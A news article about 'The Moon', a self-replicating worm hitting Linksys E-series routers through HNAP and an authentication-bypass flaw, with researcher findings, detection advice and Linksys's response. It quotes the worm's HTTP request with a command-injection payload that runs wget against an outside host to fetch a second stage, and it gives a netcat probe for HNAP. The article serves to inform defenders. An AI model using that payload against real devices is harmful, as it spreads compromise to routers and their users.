Researchers say they have uncovered an ongoing attack that infects home and small-office wireless routers from Linksys with self-replicating malware, most likely by exploiting a code-execution vulnerability in the device firmware.

Johannes B. Ullrich, CTO of the Sans Institute, told Ars he has been able to confirm that the malicious worm has infected around 1,000 Linksys E1000, E1200, and E2400 routers, although the actual number of hijacked devices worldwide could be much higher. A blog post Sans published shortly after this article was posted expanded the range of vulnerable models to virtually the entire Linksys E product line. Once a device is compromised, it scans the Internet for other vulnerable devices to infect.

"We do not know for sure if there is a command and control channel yet," Ullrich wrote in the update. "But the worm appears to include strings that point to a command and control channel. The worm also includes basic HTML pages with images that look benign and more like a calling card. They include images based on the movie "The Moon" which we used as a name for the worm."

The worm works by injecting vulnerable devices with a URL-encoded shell script that carries out the same seek-and-hijack behavior. The exploit may also change some routers' domain name system server to 8.8.8.8 or 8.8.4.4, which are IP addresses used by Google's DNS service. Compromised routers remain infected until they are rebooted. Once the devices are restarted, they appear to return to their normal state. People who are wondering if their device is infected should check for heavy outbound scanning on port 80 and 8080, and inbound connection attempts to miscellaneous ports below 1024. To detect potentially vulnerable devices use the following command:

echo "GET /HNAP1/ HTTP/1.1\r

Host: test\r

\r

" | nc routerip 8080

Devices that return the XML HNAP output may be vulnerable.

The attack begins with a remote call to the Home Network Administration Protocol (HNAP), an interface that allows ISPs and others to remotely manage home and office routers. The remote function is exposed by a built-in Web server that listens for commands sent over the Internet. Typically, it requires the remote user to enter a valid administrative password before executing commands, although previous bugs in HNAP implementations have left routers vulnerable to attack. After using HNAP to identify vulnerable routers, the worm exploits an authentication bypass vulnerability in a CGI script. (Ullrich isn't identifying the script because it remains unfixed on many older routers, and he doesn't want to make it easier for attackers to target it.) Ullrich said he has ruled out weak passwords as the cause of the Linksys infections.

So far, the only routers Ullrich has observed being compromised in the attack are the E1000, E1200, and E2400 models manufactured by Linksys. Routers running the latest 2.0.06 version of the firmware aren't being infected, leading him to believe that the vulnerability resides only in earlier versions. Unfortunately, no update is available for E1000 models, since they are no longer supported.

Infected devices are highly selective about the IP ranges they will scan when searching for other vulnerable routers. The sample Ullrich obtained listed just 627 blocks of /21 and /24 subnets. The net blocks appear to be targeting various consumer DSL and Cable ISPs worldwide, including Comcast, Cox, Roadrunner, RCN, and Charter in the US. The sample also scanned ranges owned by Bell (DSL) and Shaw (cable) in Canada, Virtua and Telesp in Brazil, RDSNET in Romania, Ziggo in the Netherlands, and Time.Net in Malaysia.

The discovery comes a week after researchers in Poland reported an ongoing attack used to steal online banking credentials, in part by modifying home routers' DNS settings. In turn, the phony domain name resolvers listed in the router settings redirected victims' computers, tablets, and smartphones to fraudulent websites masquerading as an authentic bank service; the sites would then steal the victims' login credentials. Ullrich said that the worm campaign he helped uncover this week appears to be unrelated, since there are no malicious DNS changes involved.

So why might the new attack, in select cases, redirect a router's DNS requests to Google? That remains unclear, though one theory suggests that the changes could allow attackers to bypass DNS policies enforced by specific ISPs.

Consuming bandwidth

The worm came to light earlier this week after the operator of a Wyoming ISP contacted Sans and reported a large number of customers with compromised Linksys routers. As the routers scanned IP ports 80 and 8080 as fast as they could, they consumed the bandwidth of the unidentified ISP's customers, slowed down their legitimate activity, and interrupted streams and VPN connections.

In a comment left in response to this article, ISP operator Brett Glass said the range of devices that are vulnerable is likely much wider than previously determined. He explained:

The security exploit that's used by the worm will work on all current and recent Linksys routers, including the entire E-series as well as Valet routers and some with "WRT" part numbers (for example, the WRT160). However, this particular worm seems to focus on the E-series and appears to be aimed at marshaling a botnet. So far, it does not appear that the malware flashes itself in, so it can be removed by a reboot. But it appears that any router with stock firmware that's exposed to the Internet can be reinfected even if it has a secure password.

The initial request in the attack typically begins with the strings "GET /HNAP1/ HTTP/1.1" and then "Host: [ip of host]:8080." The following requests look like this:

POST /[withheld].cgi HTTP/1.1 Host: [ip of honeypot]:8080 User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ip of honeypot]:8080/ Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH

When decoded, the request is translated to:

submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2 &ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi` &StartEPI=1

Ullrich takes this to mean that the worm downloads a second-stage exploit from port 193 of the attacking router. (The port can change, but it is always less than 1024.)

The objective behind this ongoing attack remains unclear. Given that the only observable behavior is to temporarily infect a highly select range of devices, one possible motivation is to test how viable a self-replicating worm can be in targeting routers. Indeed, last March, an anonymous hacker claimed to have built a botnet for more than 420,000 routers, modems, and other Internet-connected devices purely for the fun and knowledge it provided.

As was the case in that unconfirmed campaign, the behavior Ullrich has observed is rare, and it will be worth following Sans as it digs further into this attack. Ullrich has more details here and here.

Update: Two days after this article was published, Linksys representatives issued the following statement:

Linksys is aware of the malware called “The Moon” that has affected select older Linksys E-Series routers and select older Wireless-N access points and routers. The exploit to bypass the admin authentication used by the worm only works when the Remote Management Access feature is enabled. Linksys ships these products with the Remote Management Access feature turned off by default. Customers who have not enabled the Remote Management Access feature are not susceptible to this specific malware. Customers who have enabled the Remote Management Access feature can prevent further vulnerability to their network, by disabling the Remote Management Access feature and rebooting their router to remove the installed malware. Linksys will be working on the affected products with a firmware fix that is planned to be posted on our website in the coming weeks.

Article updated throughout to add newly available information.